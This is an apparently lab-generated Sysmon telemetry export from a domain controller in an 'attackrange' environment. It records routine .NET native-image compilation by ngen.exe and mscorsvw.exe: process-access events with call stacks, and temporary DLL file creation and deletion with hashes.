10341000x800000000000000019702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.973{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A174-60D3-FF02-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.957{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A174-60D3-FF02-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 
10341000x800000000000000019700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A174-60D3-FE02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.832{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A174-60D3-FE02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:44.832{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A174-60D3-FE02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.770{4DB9351A-A174-60D3-FD02-00000000CF01}6992NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G0VM3YOYJ3\System.ServiceProcess.ni.dll.auxMD5=7894E3AADBAC65EE6846CB64BAE89E3C,SHA256=CF666E8030F79D92981DF3B9106199DFAC7AF8F96551A54B1CB5C05EC5047436,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.770{4DB9351A-A174-60D3-FD02-00000000CF01}6992NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G0VM3YOYJ3\System.ServiceProcess.ni.dllMD5=766FB2FAD30D64EEFF95A1B6D7FF704D,SHA256=1433EA260AF380C525C211AD68C016AD9BADB6D5A6146E7A3A7B4C2EF5A057F3,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:44.754{4DB9351A-A174-60D3-FD02-00000000CF01}6992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b50-0\System.ServiceProcess.dll2021-06-23 21:02:44.754 10341000x800000000000000019694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.613{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A174-60D3-FD02-00000000CF01}6992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:44.598{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A174-60D3-FD02-00000000CF01}6992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.598{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A174-60D3-FD02-00000000CF01}6992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:44.395{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A174-60D3-FC02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.363{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A174-60D3-FC02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:44.363{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A174-60D3-FC02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.301{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18DB98E74A4A4CE6E24AABF5373EAC6C,SHA256=26072A367BDC32FB03311DE5E88A4AB4BBC388A7BF26AEBBA19485BF74EF8B5C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.285{4DB9351A-A173-60D3-FB02-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BZMUV4VOWQ\System.Runtime.Remoting.ni.dll.auxMD5=7C3A037AA7645B5E5525B827CF6BDDE4,SHA256=66F0C2B98DAFFCEF511FE94D2C83E7FE8311353207252F9C4BD78B213C4FDB98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.285{4DB9351A-A173-60D3-FB02-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BZMUV4VOWQ\System.Runtime.Remoting.ni.dllMD5=6E0E147FBBEF471CBF76FAE667A27764,SHA256=EDD5C0D6F11622A5CF38D0FFAF79187E5D7731A29EADC1A07CA36A196796FFEA,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:44.270{4DB9351A-A173-60D3-FB02-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\da4-0\System.Runtime.Remoting.dll2021-06-23 21:02:44.270 10341000x800000000000000019718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:45.816{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A175-60D3-0203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.801{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A175-60D3-0203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:45.801{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A175-60D3-0203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.754{4DB9351A-A175-60D3-0103-00000000CF01}6248NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VBGQB10SZG\Accessibility.ni.dll.auxMD5=9F3DEBAE3752FBBE597F14AB5A09E165,SHA256=41DFFFC091EAC9BA651CD3533E87EB659A2324794A014EB11107BFBCDDC713A9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.754{4DB9351A-A175-60D3-0103-00000000CF01}6248NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VBGQB10SZG\Accessibility.ni.dllMD5=EA568B250B2812F50514B8052FE9470E,SHA256=AEC0E9C8266E2FAF2189A414D108A152E628992A179432E9B0BF854CC6B837E4,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:45.738{4DB9351A-A175-60D3-0103-00000000CF01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1868-0\Accessibility.dll2021-06-23 21:02:45.738 10341000x800000000000000019712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.676{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A175-60D3-0103-00000000CF01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:45.660{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A175-60D3-0103-00000000CF01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.660{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A175-60D3-0103-00000000CF01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:45.598{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A175-60D3-0003-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.582{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A175-60D3-0003-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:45.582{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A175-60D3-0003-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\